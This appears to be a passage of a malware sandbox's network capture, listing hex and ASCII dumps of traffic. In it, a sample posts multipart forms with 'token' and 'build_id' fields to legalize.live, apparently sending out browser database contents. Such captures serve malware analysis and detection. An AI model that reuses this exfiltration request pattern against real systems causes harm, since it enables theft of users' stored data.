AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:25 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----imoh4wl6fusriec2dbs2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 69 6d 6f 68 34 77 6c 36 66 75 73 72 69 65 63 32 64 62 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 69 6d 6f 68 34 77 6c 36 66 75 73 72 69 65 63 32 64 62 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 69 6d 6f 68 34 77 6c 36 66 75 73 72 69 65 63 32 64 62 73 32 0d 0a 43 6f 6e 74 Data Ascii: ------imoh4wl6fusriec2dbs2Content-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------imoh4wl6fusriec2dbs2Content-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------imoh4wl6fusriec2dbs2Cont
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:25 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:32 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----00r9rq1nohdbimgva1vs User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:32 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 30 72 39 72 71 31 6e 6f 68 64 62 69 6d 67 76 61 31 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 30 30 72 39 72 71 31 6e 6f 68 64 62 69 6d 67 76 61 31 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 30 30 72 39 72 71 31 6e 6f 68 64 62 69 6d 67 76 61 31 76 73 0d 0a 43 6f 6e 74 Data Ascii: ------00r9rq1nohdbimgva1vsContent-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------00r9rq1nohdbimgva1vsContent-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------00r9rq1nohdbimgva1vsCont
2025-01-15 19:16:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:34 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-15 19:16:34 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-15 19:16:34 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 15 Jan 2025 19:16:34 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 902833716e75f797-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:16:34 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom%P)

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:34 UTC	594	OUT	GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-15 19:16:34 UTC	562	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgThiViYfSoTfs1aWdJTM2QJRzjkvm3DR7rqGzWEB9HPngv99nrfErYzi-Smdnd8we4 Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 15 Jan 2025 09:00:29 GMT Expires: Thu, 15 Jan 2026 09:00:29 GMT Cache-Control: public, max-age=31536000 Age: 36965 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-15 19:16:34 UTC	828	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 bb Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> 